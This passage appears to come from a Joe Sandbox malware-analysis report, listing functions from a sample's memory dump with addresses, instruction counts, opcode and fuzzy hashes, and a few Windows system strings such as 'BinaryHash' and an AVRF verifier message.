Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 930739b67fd3af611b46d155c291f898db10dedb5a060b6b2e88f4701243ee6d
Instruction ID: 8509f7b9f652b658e5ff626b53a428f077d798fdf212bc91c9f783bcda2d9051
Opcode Fuzzy Hash: 930739b67fd3af611b46d155c291f898db10dedb5a060b6b2e88f4701243ee6d
Instruction Fuzzy Hash: 3751C872D0162ADBDF58DFA9C844AEEBBB4AF04A00F054169ED11B7250E374DD81CBE8

Function 01BCE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01BCE6A4

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: aeb89fe936a3ba1887923a016050711c75ccea16e994228720d43eb7bbc4eaf5
Instruction ID: c77d262497c78c6c1f1123919f7ff940e7d83663a4221b810d3fea31a23c5588
Opcode Fuzzy Hash: aeb89fe936a3ba1887923a016050711c75ccea16e994228720d43eb7bbc4eaf5
Instruction Fuzzy Hash: C2417372509302DBDB29DA75C940B6BBBD8EF88F14F440AAEF584E7140EB74D904C7A6

Function 01C2C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01C2C77F

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 84a8808e9eda334a1b0046ed2e0117ac5baa161b9b3be5b31e1ac2a1664be28c
Instruction ID: c8423988786040d79286bf1ea07467b3edea7afc1db85e31413a26f202c8387d
Opcode Fuzzy Hash: 84a8808e9eda334a1b0046ed2e0117ac5baa161b9b3be5b31e1ac2a1664be28c
Instruction Fuzzy Hash: E14112B1D0052DEBDF219A60CC84FDEB77CAB54714F0085E5EB08A7140DB709E898FA8

Function 01C46B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01C46B91

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4613930fd7e61a78fc0ae0e735048bd99e36e24dcde50ab444a98ec1f41d9c48
Instruction ID: d982f0b86c551106328f04198a730a66a921574e6e484dca1150eaefbf17ef2a
Opcode Fuzzy Hash: 4613930fd7e61a78fc0ae0e735048bd99e36e24dcde50ab444a98ec1f41d9c48
Instruction Fuzzy Hash: EA312631E04729DBEB26CF69C840BAE7BA8EF06704F104068E941AB282C775ED45CB94

Function 01C2CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01C2CAA2

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b56d50f70ef75903d5217ce4690a7fc4fe12f1026ca0d98527a33da436dce8ce
Instruction ID: 4660335febdc2bdeecb895a53a52b435201eab60efa74fdfa54a4d9ee9ff64f8
Opcode Fuzzy Hash: b56d50f70ef75903d5217ce4690a7fc4fe12f1026ca0d98527a33da436dce8ce
Instruction Fuzzy Hash: FB31453690052AEFEB15CB49C845E6FBB74EF80760F014069E901A7650D730DE04DBE4

Function 01C3892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01C3895E

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: fddd9bc2ab209f286d6452cd1912ae2ab31707939f383c2562df3a373354a01b
Instruction ID: e6e596c0a68e52662ba6bcb1e0fcf91f3f60157b7c3bcc33995f9b02ab7de7d9
Opcode Fuzzy Hash: fddd9bc2ab209f286d6452cd1912ae2ab31707939f383c2562df3a373354a01b
Instruction Fuzzy Hash: 4701F232200342DBEA2A6A5A9CC4BAA7B75EFD1298B44022CF64217551CB64E881C792

Function 01C52000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ada58c7b86908f4d703ad90374b9a627e178c2ebbf7a6377c6350952416f52
Instruction ID: 9fdc43254541d73333942ca7fcf8cb3a8cf157e3f4115d8198bbe9ec20f31c6f
Opcode Fuzzy Hash: 45ada58c7b86908f4d703ad90374b9a627e178c2ebbf7a6377c6350952416f52
Instruction Fuzzy Hash: 9F42D236608341CBDB65CFA9C890A6BBBE5FF98740F48092DFE8297250D730D985CB56

Function 01C48158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5dfbbae85c872720a0ccd711f94ebda9eb84c54ad15ffd8d27656e0dcffea36
Instruction ID: 03e9c45f37fe56d7fce98e22ee0930619c8d6f6ffc602ab635cde89ed40e0311
Opcode Fuzzy Hash: a5dfbbae85c872720a0ccd711f94ebda9eb84c54ad15ffd8d27656e0dcffea36
Instruction Fuzzy Hash: 6C424B75E04219CFEB25CFA9C881BADBBF5BF48710F148099E949AB242E734D985CF50

Function 01BC2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f2dfe91326f14ae3fdb3047aec822b801a4c09b0072925c08358e6852028e60
Instruction ID: d6042879f56ce4be12d0bb6b96f66920c94e4def1a7bdb020304a42e9908aebf
Opcode Fuzzy Hash: 2f2dfe91326f14ae3fdb3047aec822b801a4c09b0072925c08358e6852028e60
Instruction Fuzzy Hash: 45322170A00765CBEB29CF69C8447BEBBF2BF86704F14815DD8469B289D7B4E901EB50

Function 01C5A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f07b1780b5bea7a03f7ed3b5cbe5d5b9aa2c5a07cc8ea6a4799b3f0d7f5b0f
Instruction ID: 71dac5f1717d7409e68c4ae70289c8b56822f27fb9c5b97af8476e0cfeb931b0
Opcode Fuzzy Hash: 83f07b1780b5bea7a03f7ed3b5cbe5d5b9aa2c5a07cc8ea6a4799b3f0d7f5b0f
Instruction Fuzzy Hash: 3F22B070204651CBEBA5CF2BC050772BBF1AF44344F08865ADD868F286D735D6D2DB68

Function 01BD4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: b4416a69240d10df8c480baf64ed9ecc095b39e57433883c921d9808878a09d2
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 9CF16C70E0060A9BDF1DCFA9D580BAEBBF5EF48710F0881A9E905AB654E774DD41CB60

Function 01C4892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c578cf65f3fbb00ae07f4480693f6413c6e004b51ecb373661fe262fbb8161
Instruction ID: 11386d1fbfa33d7cde8c2ae92982f462ba54fc3e0355a8a9a9f5a87347d95fc5
Opcode Fuzzy Hash: 64c578cf65f3fbb00ae07f4480693f6413c6e004b51ecb373661fe262fbb8161
Instruction Fuzzy Hash: 60D1F071A0460ACFDF09CFA9C841BFEBBF1AF88314F188169D955A7241E735EA058B60

Function 01BB65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77abada9541d6c8b83560405cf2753595c843a74355d7ed3535200fd9a257b6
Instruction ID: 85fcf3c12f491b7d7638a582ebe5a2b7c8136e067c7f3aa51655e1557a2aed8a
Opcode Fuzzy Hash: c77abada9541d6c8b83560405cf2753595c843a74355d7ed3535200fd9a257b6
Instruction Fuzzy Hash: F6E16C71508342CFC719CF28C490AAABBE0FF89314F158AADE99587751EB71ED05CB92

Function 01BA8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87744deda95d8823ce01af7e39238a2d90786ec7bd8599525cda04e2a9354379
Instruction ID: 99de9e430cffc88c234065e748f2be27c560c81f8c07e2a5686b373fb2d99097
Opcode Fuzzy Hash: 87744deda95d8823ce01af7e39238a2d90786ec7bd8599525cda04e2a9354379
Instruction Fuzzy Hash: F8D1D071A04606DBDF1DDF28C880BBE7BB5FF54205F4486ADE9169B680EB30DA50CB90

Function 01C38243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 55c259ef7d1ee217f6ac9d5e5017a50f02ffd8a8394a123385903e9c41b7470d
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: E2B16F74A00605EFDF24DB99C944AABBBB9FFC4304F10856DBA1297790DB35EA45CB10

Function 01BC0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 3e6406102905846b592243d7bd3667cbc1e07bf2643eb985dd5eb6631238f152
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 14B12435700646EFDB19DBA8C890BBEBBF6AF85700F1401A9E65297385D730EE41DB90

Function 01BB83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64ea7cf5e5a8b4e208a4fbdc6cf034f656eb4e3fceaa835e0aed676670c5097
Instruction ID: 5ca60c7af688ba784e15f8c1c35be2ec98aab886374410da4f5c70fa29c27281
Opcode Fuzzy Hash: f64ea7cf5e5a8b4e208a4fbdc6cf034f656eb4e3fceaa835e0aed676670c5097
Instruction Fuzzy Hash: C8C15974108341CFD764DF19C494BAAB7E4FF88304F44499DEA8987691D7B4EA04CF52

Function 01BAC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdccddfee983c8204d8947cccdd2bc591f5a386bce34f047ad6a91a032d727ac
Instruction ID: 0a7589dbe407c00b12de8fed243dde0ab3d5d85e64e06779fcc5d2f6541bb2ca
Opcode Fuzzy Hash: cdccddfee983c8204d8947cccdd2bc591f5a386bce34f047ad6a91a032d727ac
Instruction Fuzzy Hash: 30B18370A042568BDB29DF58C890BA9B7F5EF44700F4485EAE54AE7291EB30DDC5CF20

Function 01BDE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56cc8da8b994af0e2c04e06ba6b37c9f92c6e3cfa1157622fab6a8cf01284dd
Instruction ID: 644756a5fc71cef2e4e70828c830537c788f8a81c2805cbc7e2bd4a121c3d966
Opcode Fuzzy Hash: f56cc8da8b994af0e2c04e06ba6b37c9f92c6e3cfa1157622fab6a8cf01284dd
Instruction Fuzzy Hash: BBA14731E40615DFEB2ADB98C844BAEBBB4FB02714F050299EA11AB2D5E774DD44CBD0

Function 01BF0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765b712a70eb0099ec469cedada5f6bde042581243af74d0bdde65565f60069b
Instruction ID: 61f967aff619ca5aaf1edbb140adf2133d2abe8315278ae0b3280e6edacd6bc5
Opcode Fuzzy Hash: 765b712a70eb0099ec469cedada5f6bde042581243af74d0bdde65565f60069b
Instruction Fuzzy Hash: 1FA1E570B00626DBDB29EF69C990BAAB7F2FF54314F04416DEB0597292DB34E809C750

Function 01C84500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1b10dd88c54e892451b3121f5925eb57ea098e45eda0c932168a6f827b4b394
Instruction ID: f6c0a1129025cc2a7ef28e4a56e2dfe5f64e1681f76efc198079eccac1a16e94
Opcode Fuzzy Hash: b1b10dd88c54e892451b3121f5925eb57ea098e45eda0c932168a6f827b4b394
Instruction Fuzzy Hash: 4AA1DF72A14212DFCB2AEF18C980B6ABBE9FF58708F45056CE546DB651D734ED00CB91

Function 01C82B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: da8fa7ac534e85064985a56882f5aef8448c4904fc12e8044c0e8870fe4bee1a
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: 30B15A71E0061ADFDF19DFA9C884AADBBB5FF48304F14816AE915A7350D730EA41CB94

Function 01C360E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c80df13108c88fe3a37c4e239bd8e2b0c4495ecbb9d7d189a351dbfd0db902c
Instruction ID: fbb0b5e46aeea9693a779a2df334cb0867e277a466e234a3b87d290d052cd93e
Opcode Fuzzy Hash: 0c80df13108c88fe3a37c4e239bd8e2b0c4495ecbb9d7d189a351dbfd0db902c
Instruction Fuzzy Hash: D0918171E00226FFDF15CFA9D884BAEBBB5AB88710F154169E611EB241D734DB409FA0

Function 01BCE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8475451cfe71cf7fee81f8f202081ed3fabad04741db3ea9481bb9f32c48a7
Instruction ID: 50b5c4d889ccd2c5e401e049b12f93bf0390ec13285fae4f5e1df6ef732d0dec
Opcode Fuzzy Hash: 2e8475451cfe71cf7fee81f8f202081ed3fabad04741db3ea9481bb9f32c48a7
Instruction Fuzzy Hash: 7A912532A00652CBEB2DDB68C454BBEBFA2EF95B14F0541EDED059B284E734D901C751

Function 01C06ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e58526c6704683790c8d2bf06f89bbbe22cbf0f1bcac6c5fd8bac22b7e6aeb4
Instruction ID: 2cd40fd1c1f476d16340d9e622a134402a9101b1961a04464acf8b611dc1526b
Opcode Fuzzy Hash: 4e58526c6704683790c8d2bf06f89bbbe22cbf0f1bcac6c5fd8bac22b7e6aeb4
Instruction Fuzzy Hash: AF8193B1A00626DBDB29CF69C840ABEBBF9FB48700F14852EE545D7680E734D950CBA4

Function 01C7AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: ca399c56d4729e12129d16680116397ec59d07e157e42417088101f4734d05ef
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: 81815271A00209DFDF19CF59C890ABEBBB6FF94310F188569D9169B345D7B4EA01CB50

Function 01BEE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f6e5ff118cc7a15794f6621b825ceff311a616feb07b99b1a707540b504c30
Instruction ID: 4a805f97fe08b4842f52b2f29199e7f616cc7d6e8e701d710e79aab0f7119539
Opcode Fuzzy Hash: a4f6e5ff118cc7a15794f6621b825ceff311a616feb07b99b1a707540b504c30
Instruction Fuzzy Hash: 10817D71A00619EFDB2ACFA9C884AEEBBF9FF48314F104469E555A7250D730ED05CB60

Function 01BCC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d453d2c14d1225610901a864fce559838dc9a794afa2cc3ea1f3914083b3ebe
Instruction ID: 26965ba317f6a8a346541875b1943fbe2fb4549fc40e378427aa2c38a5dc72c2
Opcode Fuzzy Hash: 6d453d2c14d1225610901a864fce559838dc9a794afa2cc3ea1f3914083b3ebe
Instruction Fuzzy Hash: 4071EF75D0426ADBCB2A8F59C4907BEBFB0FF69B00F54416EE856AB354D3309900CBA0

Function 01C647A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82c237d42793af21d5429f7651fd6e1f773cf1180561487a8ee1254b6d1bdcd
Instruction ID: 5e3e9db06b6c18b12af6e8ef29590b586b3845efab3ce71f77c59afdf05b4e44
Opcode Fuzzy Hash: b82c237d42793af21d5429f7651fd6e1f773cf1180561487a8ee1254b6d1bdcd
Instruction Fuzzy Hash: 9671C4B0D00215EFDB29CFA9C985A9EBBFCFF90348F44415AE611A7299C731CA40CB54

Function 01BC260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a8a608ac9d5a30615bfcf8ce40049ad01bd0b047798e60f551c5f8b0ba402e
Instruction ID: 4f92f6889dbb3fef7eaf8aaf2f74504b5465206a47071588a452b79ad8366f56
Opcode Fuzzy Hash: b5a8a608ac9d5a30615bfcf8ce40049ad01bd0b047798e60f551c5f8b0ba402e
Instruction Fuzzy Hash: A871DE35604642CFD71ADF28C480B6AB7E5FF84B14F0485EAE8958B352DB74DC46CBA1

Function 01C3035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 6b70082ffa5cf3e8da2407624f643e97eb53f71804bebfd5ad833c5f2ed171cf
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: 55716D72A0061AEFDB14DFA9C984ADEBBF8FF88700F144569E505E7290DB34EA51CB50

Function 01C462A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9dd52b6fd97698dc244608a7cc4951d057f6549394bffb3289e30f8e6629c76
Instruction ID: 0b4343353bdab330dde13eef6d47dbb1e72f1a5bc008a366ce25f82eaf7bb3f8
Opcode Fuzzy Hash: a9dd52b6fd97698dc244608a7cc4951d057f6549394bffb3289e30f8e6629c76
Instruction Fuzzy Hash: 52710332204712EFEB36CF18C844F5ABBE6EF45B24F14845CE616872A5D774EA44CB50

Function 01BB8AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6649d6193bee9a264224fb7930a5b244aeb6466b5a7d709c6baa8608b023020
Instruction ID: 4727235a33a8e138b9a185305fcf3d8ce88ecf5a96443eac0c2051b435b97757
Opcode Fuzzy Hash: c6649d6193bee9a264224fb7930a5b244aeb6466b5a7d709c6baa8608b023020
Instruction Fuzzy Hash: D4811176A04301CFDB29CF98C484BAD77BAFB49324F69416DD900AB285C3B1DE00DB90

Function 01C88324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7369e948aeb9c953d9b9a44662892992ab37c7c00083845264d8eb96d1ebb0b
Instruction ID: 5493d205d32bb94d66f475b147f2b8cd2017348ce9ef203084329cd259601d43
Opcode Fuzzy Hash: c7369e948aeb9c953d9b9a44662892992ab37c7c00083845264d8eb96d1ebb0b
Instruction Fuzzy Hash: EF713A71E0020AEFEF15DF94C881FEEBBB9FB04754F504169E610A6690D774EA45CBA0

Function 01C6A250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b08792cf8565301c4b130023166494c2370f71095c7936bb97714da5a1da3ca
Instruction ID: 3660684628bb1bb6eca316a7f16acdbca0479d892a594bf80b276ea8d99c3a89
Opcode Fuzzy Hash: 6b08792cf8565301c4b130023166494c2370f71095c7936bb97714da5a1da3ca
Instruction Fuzzy Hash: AA516E72508612EFD712DA68C884B6BBBECEB85B50F014969BA40EB150D770ED05C7A2

Function 01C58350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cbb73216f68f5186a3e237363dee6ef747e8650bf546f000ba3120c1ee6e28
Instruction ID: b0207439d18572a23e2d7fde52057ddc09b25385adab8a336405e83d268da47c
Opcode Fuzzy Hash: a0cbb73216f68f5186a3e237363dee6ef747e8650bf546f000ba3120c1ee6e28
Instruction Fuzzy Hash: EE51AD70900705DBDB61CF5AC884AABFFF8BF64710F10461EEA92976A1C7B0E685CB54

Function 01BEE443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
